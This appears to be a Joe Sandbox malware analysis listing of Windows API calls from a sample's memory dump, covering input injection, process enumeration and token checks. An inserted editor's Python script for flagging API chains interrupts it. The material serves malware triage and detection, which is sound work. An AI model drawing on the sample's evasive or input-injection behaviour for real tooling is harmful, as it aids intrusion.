                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LongWindow$InvalidateMessageRectSend
                                        • String ID:
                                        • API String ID: 3340791633-0
                                        • Opcode ID: 2c756bb142498daa6dbda40a8009dfd4532200faa6bb99f4f6ea9af29abcd0cf
                                        • Instruction ID: 6dce28cfe342f1ce02e54e878ff015a84bbc757bbc4093971be401afcdb02958
                                        • Opcode Fuzzy Hash: 2c756bb142498daa6dbda40a8009dfd4532200faa6bb99f4f6ea9af29abcd0cf
                                        • Instruction Fuzzy Hash: 95319E34A55A08AFEB349B14CC46BEA7767BB05390F584101FA919A2E1C7F1A980DF92
                                        APIs
                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 000DABF1
                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 000DAC0D
                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 000DAC74
                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 000DACC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: edc4f0b0626de8c0beb04604b702f7e8655548d4e29ae87ada74a980ff2568be
                                        • Instruction ID: 7cb452356e1ee9e2ebf19afe2d21a46357c15ec5a9ab0e88a0a38c53ca5af31b
                                        • Opcode Fuzzy Hash: edc4f0b0626de8c0beb04604b702f7e8655548d4e29ae87ada74a980ff2568be
                                        • Instruction Fuzzy Hash: A631E530B607186FEB358B6588047FE7BA5AB8A330F04531BE485523D1C37589858BB2
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 0010769A
                                        • GetWindowRect.USER32(?,?), ref: 00107710
                                        • PtInRect.USER32(?,?,00108B89), ref: 00107720
                                        • MessageBeep.USER32(00000000), ref: 0010778C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: 2101494dd0c6f4bd922ab1f24af2313b52d34ed64b41679dd5ce777f5918eab8
                                        • Instruction ID: 80db237227b203204b1fd294901a07ae752995aebf0f6189a74d38de6af6fdff
                                        • Opcode Fuzzy Hash: 2101494dd0c6f4bd922ab1f24af2313b52d34ed64b41679dd5ce777f5918eab8
                                        • Instruction Fuzzy Hash: 0241AD38A05254EFDB11CF58C898EA977F4FB49384F1581A8E8949B2E1C3B1B981CF90
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 001016EB
                                          • Part of subcall function 000D3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000D3A57
                                          • Part of subcall function 000D3A3D: GetCurrentThreadId.KERNEL32 ref: 000D3A5E
                                          • Part of subcall function 000D3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000D25B3), ref: 000D3A65
                                        • GetCaretPos.USER32(?), ref: 001016FF
                                        • ClientToScreen.USER32(00000000,?), ref: 0010174C
                                        • GetForegroundWindow.USER32 ref: 00101752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                        • String ID:
                                        • API String ID: 2759813231-0
                                        • Opcode ID: c7ea62d6de0345f467e69594d613fb8a499d97b05a2ad26a3ef2b147079b9bf2
                                        • Instruction ID: 1795809185765db09cafc4be2a83f897e72747d61fc311ca9347a58999d7b264
                                        • Opcode Fuzzy Hash: c7ea62d6de0345f467e69594d613fb8a499d97b05a2ad26a3ef2b147079b9bf2
                                        • Instruction Fuzzy Hash: 71316171D00249AFD700EFA9C881CEEB7F9EF48304B50806AE459E7252D7759E45CFA1
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 000DD501
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 000DD50F
                                        • Process32NextW.KERNEL32(00000000,?), ref: 000DD52F
                                        • CloseHandle.KERNEL32(00000000), ref: 000DD5DC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: c33150038c301e1932776f005a42bd6dd057b8b9a17fa6511f039c7e6d64f446
                                        • Instruction ID: f8f1c9d1b45a99cc0b9ce808803d3eb1276afdc2f41f38b979fd2df1ad62aa43
                                        • Opcode Fuzzy Hash: c33150038c301e1932776f005a42bd6dd057b8b9a17fa6511f039c7e6d64f446
                                        • Instruction Fuzzy Hash: 4B31C2715083019FD300EF64D881EAFBBF8EF99354F10492EF585862A2EB719945CBA3
                                        APIs
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        • GetCursorPos.USER32(?), ref: 00109001
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000C7711,?,?,?,?,?), ref: 00109016
                                        • GetCursorPos.USER32(?), ref: 0010905E
                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000C7711,?,?,?), ref: 00109094
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                        • String ID:
                                        • API String ID: 2864067406-0
                                        • Opcode ID: 19fefc4cc0d80832ab60d14199a2f59fe39cf97bbd6fefbbed07e75d088b8033
                                        • Instruction ID: 95533030cbeddb5a64d61379fb139d5b737da091c1a4b5cd8edb58ad77969230
                                        • Opcode Fuzzy Hash: 19fefc4cc0d80832ab60d14199a2f59fe39cf97bbd6fefbbed07e75d088b8033
                                        • Instruction Fuzzy Hash: 42218D35600018BFDB258F94CC68EFA7BB9FB4A350F044155F9854B2A2C3B19990DBA0
                                        APIs
                                        • GetFileAttributesW.KERNEL32(?,0010CB68), ref: 000DD2FB
                                        • GetLastError.KERNEL32 ref: 000DD30A
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 000DD319
                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0010CB68), ref: 000DD376
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                        • String ID:
                                        • API String ID: 2267087916-0
                                        • Opcode ID: 89bcfbddc4b6b40f6de340f1ea126228703d4065dbe1d33eb7ae045cbcffbe5c
                                        • Instruction ID: 0d9c19e48cb33443984d270ca9a66d32fff8623b7cc6bdeb592cafb60ab8cbc1
                                        • Opcode Fuzzy Hash: 89bcfbddc4b6b40f6de340f1ea126228703d4065dbe1d33eb7ae045cbcffbe5c
                                        • Instruction Fuzzy Hash: 15215C705093019FC710DF28C8818AE77E4AF5A364F504A1BF499C73A2DB719A45CFA7
                                        APIs
                                          • Part of subcall function 000D1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000D102A
                                          • Part of subcall function 000D1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000D1036
                                          • Part of subcall function 000D1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000D1045
                                          • Part of subcall function 000D1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000D104C
                                          • Part of subcall function 000D1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000D1062
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000D15BE
                                        • _memcmp.LIBVCRUNTIME ref: 000D15E1
                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1617
                                        • HeapFree.KERNEL32(00000000), ref: 000D161E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                        • String ID:
                                        • API String ID: 1592001646-0
                                        • Opcode ID: 36731ce34bd12433cef9bc0840a1e79dab8290bfb8d056e07c78676a1c95e7f7
                                        • Instruction ID: dab42da1405628c43027f1bf9f3d948eadde660d7f7f79cc4098b3402533da7e
                                        • Opcode Fuzzy Hash: 36731ce34bd12433cef9bc0840a1e79dab8290bfb8d056e07c78676a1c95e7f7
                                        • Instruction Fuzzy Hash: 29216971E00209FFDB00DFA4C949BEEB7F8EF44344F08855AE441AB241EB74AA45CBA0
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EC), ref: 0010280A
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00102824
                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00102832
                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00102840
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Long$AttributesLayered
                                        • String ID:
                                        • API String ID: 2169480361-0
                                        • Opcode ID: dc2bbbabace07d63815f8262e2f2584d9e956b1c538cac4503c4cc8d6417821d
                                        • Instruction ID: 7c761d882b4efafec11c23f781f57d48585ab4d5876534c84d957fe5da929822
                                        • Opcode Fuzzy Hash: dc2bbbabace07d63815f8262e2f2584d9e956b1c538cac4503c4cc8d6417821d
                                        • Instruction Fuzzy Hash: 66210635704510AFD7149B24CC48FAA7795AF46324F148259F4568B6D2CBB5FC82CBD0
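The three listings above are the kind of per-function API chains that feed report signatures such as "Found API chain indicative of sandbox detection": the Toolhelp32 process walk (CreateToolhelp32Snapshot / Process32FirstW / Process32NextW), the TokenIntegrityLevel query followed by LookupPrivilegeValueW, and the GetWindowLongW / SetWindowLongW / SetLayeredWindowAttributes sequence that changes a window's alpha. As an added example that is not part of the Joe Sandbox report, the following Python script parses listings in this page's format and flags such chains. The chain table, the function names and the embedded sample are the editor's (the sample lines are copied from the blocks above in the report's own format); the chains are illustrative triage heuristics, not Joe Sandbox's signature logic.

```python
"""Flag API chains in Joe Sandbox-style per-function API listings.

Added example, not part of the Joe Sandbox report. CHAINS holds editor-chosen
heuristics drawn from calls listed on this page, not the sandbox's own rules.
"""
import re

# One API reference line from an "APIs" block, e.g.
#   • Process32FirstW.KERNEL32(00000000,?), ref: 000DD50F
#   • Part of subcall function 000D1014: GetTokenInformation.ADVAPI32(...), ref: 000D102A
# Greedy args capture keeps nested parentheses such as 00000003(TokenIntegrityLevel).
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Chain name -> ordered steps of (API name, substring required in the call's
# arguments, or None). Every step must occur in the same function (directly or
# via a listed subcall) for the chain to fire.
CHAINS = {
    "process-enumeration-toolhelp32": [
        ("CreateToolhelp32Snapshot", None), ("Process32FirstW", None), ("Process32NextW", None)],
    "token-integrity-level-check": [
        ("GetTokenInformation", "TokenIntegrityLevel"), ("LookupPrivilegeValueW", None)],
    "layered-window-alpha": [
        ("GetWindowLongW", None), ("SetWindowLongW", None), ("SetLayeredWindowAttributes", None)],
}


def parse_functions(text):
    """Split a listing into functions: each starts at an 'APIs' header and is
    closed by its '• Opcode ID:' line. Returns dicts with 'apis' and 'opcode_id'."""
    funcs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "opcode_id": None}
            funcs.append(cur)
        elif cur is None:
            continue  # metadata of a function without an API block, or page chrome
        elif line.startswith("• Opcode ID:"):
            cur["opcode_id"] = line.split(":", 1)[1].strip()
            cur = None
        else:
            m = API_LINE.match(line)
            if m:
                cur["apis"].append(m.groupdict())
    return funcs


def _find_call(calls, api, arg_substr):
    for c in calls:
        if c["api"] == api and (arg_substr is None or arg_substr in (c["args"] or "")):
            return c
    return None


def match_chains(calls):
    """Return {chain name: [ref address of each matching step]} for one function."""
    hits = {}
    for name, steps in CHAINS.items():
        found = [_find_call(calls, api, sub) for api, sub in steps]
        if all(found):
            hits[name] = [c["ref"] for c in found]
    return hits


def triage(text):
    """Map each function's Opcode ID to its chain hits; functions with none are omitted."""
    out = {}
    for f in parse_functions(text):
        hits = match_chains(f["apis"])
        if hits:
            out[f["opcode_id"]] = hits
    return out


# Constructed sample: lines copied from this report's listing, trimmed to the
# parts the parser uses. The editor's test input, not a report export.
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 000DD501
• Process32FirstW.KERNEL32(00000000,?), ref: 000DD50F
• Process32NextW.KERNEL32(00000000,?), ref: 000DD52F
• CloseHandle.KERNEL32(00000000), ref: 000DD5DC
Memory Dump Source
• Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
• Opcode ID: c33150038c301e1932776f005a42bd6dd057b8b9a17fa6511f039c7e6d64f446
APIs
  • Part of subcall function 000D1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000D102A
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 000D15BE
• _memcmp.LIBVCRUNTIME ref: 000D15E1
• Opcode ID: 36731ce34bd12433cef9bc0840a1e79dab8290bfb8d056e07c78676a1c95e7f7
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 0010280A
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00102824
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00102840
• Opcode ID: dc2bbbabace07d63815f8262e2f2584d9e956b1c538cac4503c4cc8d6417821d
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 000D1A47
• Opcode ID: 4e3ec460147f41c9f34a68bf0128494709b8ed8fc79c574fdeb8a421bfb216f9
"""

if __name__ == "__main__":
    for opcode_id, hits in triage(SAMPLE).items():
        for chain, refs in hits.items():
            print(f"{opcode_id[:16]}...  {chain}: {' '.join(refs)}")
```

The refs returned per step are the addresses to open in the IDA snapshot. A caveat for this particular sample: the report classifies the binary as a likely compiled AutoIt script, and GUI and process-walking code of this shape is consistent with the AutoIt interpreter runtime rather than with the script's payload, so a chain hit here marks a function to inspect, not a verdict; the report's own signature engine is what produced the "Found API chain indicative of sandbox detection" line.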
                                        APIs
                                          • Part of subcall function 000D8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,000D790A,?,000000FF,?,000D8754,00000000,?,0000001C,?,?), ref: 000D8D8C
                                          • Part of subcall function 000D8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 000D8DB2
                                          • Part of subcall function 000D8D7D: lstrcmpiW.KERNEL32(00000000,?,000D790A,?,000000FF,?,000D8754,00000000,?,0000001C,?,?), ref: 000D8DE3
                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,000D8754,00000000,?,0000001C,?,?,00000000), ref: 000D7923
                                        • lstrcpyW.KERNEL32(00000000,?), ref: 000D7949
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,000D8754,00000000,?,0000001C,?,?,00000000), ref: 000D7984
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: 96bcaa64776fe9e8adb5bdb9f52510b01d3da6374a42a7df7ad515f09e134c1a
                                        • Instruction ID: 2fb386c7080d6ba244c161ffcf6bca5888ba0ef4535de336b7a288e6c792e93b
                                        • Opcode Fuzzy Hash: 96bcaa64776fe9e8adb5bdb9f52510b01d3da6374a42a7df7ad515f09e134c1a
                                        • Instruction Fuzzy Hash: F911B43A200302ABCB155F34D855D7AB7E5FF85350B50802BF946C73A5FB719851CBA1
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00107D0B
                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00107D2A
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00107D42
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000EB7AD,00000000), ref: 00107D6B
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID:
                                        • API String ID: 847901565-0
                                        • Opcode ID: a4a66a86eaafb8de0a2f26e0519dca8f5a63dbeab9befc5d70e1c94eb10dcfaf
                                        • Instruction ID: d30610210168844775274c3b2b1539c923073e43d80ee7ce3339ceb24b4a0e41
                                        • Opcode Fuzzy Hash: a4a66a86eaafb8de0a2f26e0519dca8f5a63dbeab9befc5d70e1c94eb10dcfaf
                                        • Instruction Fuzzy Hash: 8211E135A05655AFCB109F68CC04AB63BA4BF46360B258728F879C72F0E770ED90CB90
                                        APIs
                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 001056BB
                                        • _wcslen.LIBCMT ref: 001056CD
                                        • _wcslen.LIBCMT ref: 001056D8
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00105816
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend_wcslen
                                        • String ID:
                                        • API String ID: 455545452-0
                                        • Opcode ID: c600eed84b882feb1722e6ba8e32e5cd1b8d9a66bf809dcf11dc6e0822e97073
                                        • Instruction ID: 4e1bb3ca1d91b5cf59e495cf68a2da5a2dd83ed5701cce8441beb91497af590e
                                        • Opcode Fuzzy Hash: c600eed84b882feb1722e6ba8e32e5cd1b8d9a66bf809dcf11dc6e0822e97073
                                        • Instruction Fuzzy Hash: 7211B175A00608A6DF209F61CC85AEF7BBCEF11764B104126F995D60C1EBF08A81CF60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f15094e212e5df4f32ed88c2f16961d83fba2a1e5eaf287b478b2f68493b693
                                        • Instruction ID: 2385014646d5597598195587a99769f78421278949d86540f70cd80c5400c113
                                        • Opcode Fuzzy Hash: 6f15094e212e5df4f32ed88c2f16961d83fba2a1e5eaf287b478b2f68493b693
                                        • Instruction Fuzzy Hash: C2016DB26096167EF6A126F86CC1FAB669DDF837B8F340329F525A11D2DB708C4055A0
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 000D1A47
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000D1A59
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000D1A6F
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000D1A8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 4e3ec460147f41c9f34a68bf0128494709b8ed8fc79c574fdeb8a421bfb216f9
                                        • Instruction ID: ce6f632397c0cbac07c756cfdec05a2645d558c5c60d53588b67c82933a1826d
                                        • Opcode Fuzzy Hash: 4e3ec460147f41c9f34a68bf0128494709b8ed8fc79c574fdeb8a421bfb216f9
                                        • Instruction Fuzzy Hash: 6F110C3AD01219FFEB11DBA9CD85FEDBB78EB04750F200092E604B7290DA716E51DB94
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 000DE1FD
                                        • MessageBoxW.USER32(?,?,?,?), ref: 000DE230
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000DE246
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000DE24D
                                        Memory Dump Source
